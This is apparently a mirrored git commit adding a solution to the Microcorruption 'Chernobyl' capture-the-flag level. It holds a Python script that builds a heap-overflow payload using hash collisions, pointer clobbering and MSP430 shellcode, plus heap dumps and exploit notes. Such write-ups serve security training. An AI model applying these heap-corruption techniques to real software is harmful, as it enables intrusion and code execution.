mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-22 06:55:58 +00:00
Solve Chernobyl
This commit is contained in:
parent
31df36d848
commit
f63718bc9b
53
17-Chernobyl/Code/crappy_python/chernobreak.py
Normal file
53
17-Chernobyl/Code/crappy_python/chernobreak.py
Normal file
@ -0,0 +1,53 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# user info
|
||||||
|
user_struct_size = 0x12 # User is a tuple of (char[16], i16)
|
||||||
|
|
||||||
|
users_per_box = 0x5
|
||||||
|
|
||||||
|
# Stack info
|
||||||
|
ret_stack_addr = 0x3dce - 0x0004 # 3nd index of header struct
|
||||||
|
ret_addr = 0x49a2 # Address that will be returned to
|
||||||
|
stackbuffer_top = 0x3df0 - 0x0006 # top of stack buffer, PLUS "new "
|
||||||
|
target_offset = ((stackbuffer_top - ret_addr) & 0xffff) + 1
|
||||||
|
|
||||||
|
print(f"{ret_stack_addr = :x}, {ret_addr = :x}, {target_offset = :x}");
|
||||||
|
|
||||||
|
bnew = b'new '
|
||||||
|
|
||||||
|
clobber = ret_stack_addr.to_bytes(2, 'little').hex() + 'fc50' + target_offset.to_bytes(2, 'little').hex()
|
||||||
|
|
||||||
|
'''
|
||||||
|
sub.b #1, r8 5883
|
||||||
|
swpb r8 8810
|
||||||
|
mov r8, sr 0248
|
||||||
|
mov #4cfc, pc 3040 fc4c
|
||||||
|
'''
|
||||||
|
payload = "5883 8810 0248 3040fc4c"
|
||||||
|
|
||||||
|
# Hash function, which governs the boxes
|
||||||
|
def hash(byts: bytes):
|
||||||
|
ret = 0;
|
||||||
|
for c in byts:
|
||||||
|
ret += c
|
||||||
|
ret = ((ret << 5) - ret) & 0xffff
|
||||||
|
return ret
|
||||||
|
|
||||||
|
# Fix a string by adding a character that causes a hash collision
|
||||||
|
def fixhash(name:bytes, box:int, modulus:int):
|
||||||
|
error = box - (hash(name) % modulus)
|
||||||
|
if error % modulus == 0:
|
||||||
|
return name
|
||||||
|
name += (ord("@")+error+modulus).to_bytes(1, "big")
|
||||||
|
print(f"{name.hex() = }; {error = }; new box = {hash(name) % modulus}")
|
||||||
|
return name
|
||||||
|
|
||||||
|
def a2h (s: str):
|
||||||
|
return bytes(s, 'ascii').hex()
|
||||||
|
payload = f'{a2h("new ")} {fixhash(bytes.fromhex(payload), 0, 16).hex()} {a2h(" ;new 8 ;new @ ;new H ;new P ;")} {bnew.hex()} {fixhash(bytes.fromhex(clobber), 0, 16).hex()} {a2h(" ;new 1 ;new 9 ;new A ;new I ;new Q ;new")}'
|
||||||
|
print(payload)
|
||||||
|
|
||||||
|
exit(0)
|
||||||
|
while 1:
|
||||||
|
name, box = input("> ").split()
|
||||||
|
print(fixhash(bytes(name, "ascii"), int(box), 16).decode('ascii'));
|
@ -1,23 +1,23 @@
|
|||||||
|
|
||||||
Hash Table, plus one full box:
|
Hash Table, plus one full box:
|
||||||
|
0 1 2 3 4 5 6 7 8 9 a b c d e f
|
||||||
5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P
|
5000:[0050 1050 1500]0b00 0300 0500 1650 2c50 .P.P.........P,P
|
||||||
5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
|
5010:[0050 2650 2100]4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
|
||||||
5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P<P!.....
|
5020: 2252 8252 e252[1050 3c50 2100]0b00 0000 "R.R.R.P<P!.....
|
||||||
5030: 0000 0000 0000 0000 0000 0000 2650 9c50 ............&P.P
|
5030: 0000 0000 0000 0000 0000 0000[2650 9c50 ............&P.P
|
||||||
5040: b500 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
|
5040: b500]4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
|
||||||
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
|
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
|
||||||
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
|
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
|
||||||
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
|
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
|
||||||
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
|
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
|
||||||
5090: 4141 4141 4141 4141 4100 e004 4141 4141 AAAAAAAAA...AAAA ; wait a second
|
5090: 4141 4141 4141 4141 4100 e004[4141 4141 AAAAAAAAA...AAAA ; wait a second
|
||||||
50a0: 4141 4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
|
50a0: 4141]4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
|
||||||
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
|
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
|
||||||
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
|
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
|
||||||
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
|
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
|
||||||
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
|
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
|
||||||
50f0: 4141 4100 e004 4141 4141 4800 9c50 5c51 AAA...AAAAH..P\Q
|
50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51 AAA...AAAAH..P\Q
|
||||||
5100: b500 0000 0000 e004 0000 0000 0000 0000 ................
|
5100: b500]0000 0000 e004 0000 0000 0000 0000 ................
|
||||||
|
|
||||||
Heap metadata @ 2400: 0050 0080 0000
|
Heap metadata @ 2400: 0050 0080 0000
|
||||||
Heap start: 0x5000
|
Heap start: 0x5000
|
||||||
@ -51,10 +51,15 @@ Section header metadata @ 5026: 1050 3c50 2100
|
|||||||
[ Prev: 5010, Next: 503c, Size: 0010 ]
|
[ Prev: 5010, Next: 503c, Size: 0010 ]
|
||||||
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
|
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
|
||||||
|
|
||||||
|
|
||||||
The Exploit:
|
|
||||||
When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA
|
|
||||||
|
|
||||||
|
|
||||||
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
|
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
|
||||||
print(f'new {c} ;',end="")
|
print(f'new {c} ;',end="")
|
||||||
|
|
||||||
|
Malloc:
|
||||||
|
- Checks to make sure next pointer is always ASCENDING
|
||||||
|
- Does not check prev pointer!!!!
|
||||||
|
|
||||||
|
The Exploit:
|
||||||
|
- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
|
||||||
|
- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
|
||||||
|
- Place pc into a payload on the stack
|
||||||
|
- INT 0x7f
|
||||||
|
Loading…
Reference in New Issue
Block a user